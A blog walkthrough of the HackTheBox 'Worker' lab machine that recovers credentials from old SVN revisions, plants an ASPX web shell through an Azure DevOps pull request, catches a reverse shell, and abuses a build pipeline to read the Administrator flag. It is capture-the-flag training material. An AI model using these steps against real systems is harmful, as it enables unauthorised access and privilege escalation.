WORKER HACKTHEBOX WRITEUP

NMAP SCANS

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-22 17:11 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating Ping Scan at 17:11
Scanning 10.10.10.203 [4 ports]
Completed Ping Scan at 17:11, 0.44s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 17:11
Scanning alpha.worker.htb (10.10.10.203) [1000 ports]
Discovered open port 80/tcp on 10.10.10.203
Discovered open port 3690/tcp on 10.10.10.203
Completed SYN Stealth Scan at 17:11, 25.11s elapsed (1000 total ports)
Initiating Service scan at 17:11
Scanning 2 services on alpha.worker.htb (10.10.10.203)
Completed Service scan at 17:11, 6.86s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against alpha.worker.htb (10.10.10.203)
Retrying OS detection (try #2) against alpha.worker.htb (10.10.10.203)
Initiating Traceroute at 17:11
Completed Traceroute at 17:11, 0.52s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 17:11
Completed Parallel DNS resolution of 2 hosts. at 17:11, 0.25s elapsed
NSE: Script scanning 10.10.10.203.
Initiating NSE at 17:11
Completed NSE at 17:11, 7.69s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 1.84s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Nmap scan report for alpha.worker.htb (10.10.10.203)
Host is up (0.43s latency).
Not shown: 998 filtered ports
PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Alpha by HTML5 UP
3690/tcp open  svnserve Subversion
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
No OS matches for host
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=263 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

TRACEROUTE (using port 80/tcp)
HOP RTT       ADDRESS
1   507.46 ms 10.10.14.1
2   507.71 ms alpha.worker.htb (10.10.10.203)

NSE: Script Post-scanning.
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Initiating NSE at 17:11
Completed NSE at 17:11, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 50.67 seconds
           Raw packets sent: 2097 (95.952KB) | Rcvd: 49 (3.178KB)

PORT 80

Here we have nothing but IIS

SVN ENUMERATION

AS we can see that we have PORT 3690 which is svn port which we need to use to enumerate so lets dig into it

Firstly that svn is kind off similar to git which mean that as we use git command to clone push repos similarly we can use svn but with changed keywords!!

https://backlog.com/git-tutorial/reference/commands/

https://www.perforce.com/blog/vcs/svn-commands-cheat-sheet

Here in above links you can take help to clone repo

So lets clone with basic command

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #svn checkout svn://10.10.10.203
Restored 'dimension.worker.htb'
Restored 'dimension.worker.htb/images'
Restored 'dimension.worker.htb/images/pic03.jpg'
Restored 'dimension.worker.htb/images/overlay.png'
Restored 'dimension.worker.htb/images/bg.jpg'

<-------->

'dimension.worker.htb/assets/sass/libs/_breakpoints.scss'
Checked out revision 5.

Here above we have cloned repo so after enumerating we got only subdomains

Now we will clone using other revision

what revision is the kind off freshly created repo as first one will have 0 number 2nd one will have 1 number

So lets see how it works

┌─[✗]─[root@liquid]─[~/Desktop/HTB/worker/dimension]
└──╼ #svn checkout -r 2 svn://10.10.10.203
A    deploy.ps1
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt
A    dimension.worker.htb/assets
A    dimension.worker.htb/assets/css
A    dimension.worker.htb/assets/css/fontawesome-all.min.css
A    dimension.worker.htb/assets/css/main.css
A    dimension.worker.htb/assets/css/noscript.css
A    dimension.worker.htb/assets/js

<------>

Here we can see that we have some more files which were not their during latest repo So lets check that

┌─[✗]─[root@liquid]─[~/Desktop/HTB/worker/dimension]
└──╼ #cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
┌─[root@liquid]─[~/Desktop/HTB/worker/dimension]

Here we got some credentials

$user = “nathen”
$plain = “wendel98”

another way to dig between repo is to use command diff

During revision 1

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #svn diff -r 1
Index: moved.txt
===================================================================
--- moved.txt	(nonexistent)
+++ moved.txt	(revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team 🙂
+

During revision 2

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #svn diff -r 2
Index: deploy.ps1
===================================================================
--- deploy.ps1	(revision 2)
+++ deploy.ps1	(nonexistent)
@@ -1,6 +0,0 @@
-$user = "nathen" 
-$plain = "wendel98"
-$pwd = ($plain | ConvertTo-SecureString)
-$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
-$args = "Copy-Site.ps1"
-Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
Index: moved.txt
===================================================================
--- moved.txt	(nonexistent)
+++ moved.txt	(revision 5)
@@ -0,0 +1,5 @@
+This repository has been migrated and will no longer be maintaned here.
+You can find the latest version at: http://devops.worker.htb
+
+// The Worker team 🙂
+

Here we can clearly see that we have a file named deploy.ps1

Lets Use those password to login to devops.worker.htb

DEVOPS.WORKER.HTB

nathen:wendel98

In this we can see that we have access to number of websites so lets upload shell to website and will trigger that by visiting that website

Shell which we will be uploading is aspx for web app exploit

https://github.com/puckiestyle/aspx/blob/master/InsomniaShell.aspx

So lets upload that

To upload we need to follow instruction as we cannot dorectly upload into master branch so we need to pull a branch first

Just click on branches and create a new one

After that upload a shell on it by clicking on to your branch

Then you will have a “create a pull request” option just click that

Then click on create

Then click on Approve Then Complete both buttons are side by side

Then complete merge

You are done!!

After some seconds just go access your shell

and create a reverse shell

You will get shell as this

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #rlwrap nc -lnvp 9008
listening on [any] 9008 ...
connect to [10.10.14.3] from (UNKNOWN) [10.10.10.203] 52441
Shell enroute.......
Microsoft Windows [Version 10.0.17763.1282]
(c) 2018 Microsoft Corporation. All rights reserved.

c:\windows\system32\inetsrv>whoami
whoami
iis apppool\defaultapppool
c:\windows\system32\inetsrv>powershell.exe
powershell.exe
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv>

Here after enumerating i came to know that i have no access to anything SO lets get all drives

PS C:\> Get-Volume
Get-Volume

DriveLetter FriendlyName FileSystemType DriveType HealthStatus OperationalStatus SizeRemaining    Size
----------- ------------ -------------- --------- ------------ ----------------- -------------    ----
C                        NTFS           Fixed     Healthy      OK                      9.65 GB 29.4 GB
W           Work         NTFS           Fixed     Healthy      OK                     17.06 GB   20 GB
            Recovery     NTFS           Fixed     Healthy      OK                    118.04 MB  499 MB


So lets get into W:\

PS W:\> ls
ls


    Directory: W:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-16     18:59                agents                                                                
d-----       2020-03-28     14:57                AzureDevOpsData                                                       
d-----       2020-04-03     11:31                sites                                                                 
d-----       2020-06-20     16:04                svnrepos     
PS W:\> cd svnrepos
cd svnrepos
PS W:\svnrepos> ls
ls


    Directory: W:\svnrepos


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-20     11:29                www                                                                   


PS W:\svnrepos> cd www
cls
d www
PS W:\svnrepos\www> ls


    Directory: W:\svnrepos\www


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----       2020-06-20     15:30                conf                                                                  
d-----       2020-06-20     15:52                db                                                                    
d-----       2020-06-20     11:29                hooks                                                                 
d-----       2020-06-20     11:29                locks                                                                 
-ar---       2020-06-20     11:29              2 format                                                                
-a----       2020-06-20     11:29            251 README.txt                                                            

PS W:\svnrepos\www> cd conf
cd conf
PS W:\svnrepos\www\conf> ls
ls


    Directory: W:\svnrepos\www\conf


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-a----       2020-06-20     11:29           1112 authz                                                                 
-a----       2020-06-20     11:29            904 hooks-env.tmpl                                                        
-a----       2020-06-20     15:27           1031 passwd                                                                
-a----       2020-04-04     20:51           4454 svnserve.conf                                                         


PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
<----->

Here we got number of passwords but we need valid ones so if you remember that we had a user named robisl so lets capture his password

robisl = wolves11

So lets use evil-winrm

USER ACCESS

┌─[root@liquid]─[~/Desktop/HTB/worker]
└──╼ #evil-winrm -u robisl -p wolves11 -i 10.10.10.203

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl
*Evil-WinRM* PS C:\Users\robisl\Documents> cd ..\Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> ls


    Directory: C:\Users\robisl\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        8/22/2020   7:39 AM             34 user.txt


*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
16dfdc02fa843b51362d885c28d53a6d

Here we go with User FLag!!

Now Time to go For Administrator

ADMINISTRATOR ACCESS

So after checking files we will see that we have no access to any priv file

So lets use this creds in devops.worker.htb

And we will get in

Here we go So lets check if we have any repo

But as you can see we have no repo website

But we can create Pipeline

So lets create a new one

Instructions To Follow

Create new pipeline

Click Azure Repos Git

Then Click PartsUnlimited

Now if you scroll down you will have Starter Pipeline just click on that

Just remove everything and Paste this down

steps:
- script: whoami /all
  displayName: 'Run a one-line script'

Then just save and run then create a new branch by giving out random name and then again save and run

Here you can see that we are administrator

So lets get ROOT FLAG

Just create a new pipeline again and follow the above steps but paste this code

steps:
- script: type c:\Users\Administrator\Desktop\root.txt
  displayName: 'Run a one-line script'

Just wait and Get your root flag

So here you go with root flag!!

HOPE YOU LOVE THIS WALKTHROUGH BY LIQUIDRAGE

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

WordPress.com.

Up ↑

%d bloggers like this: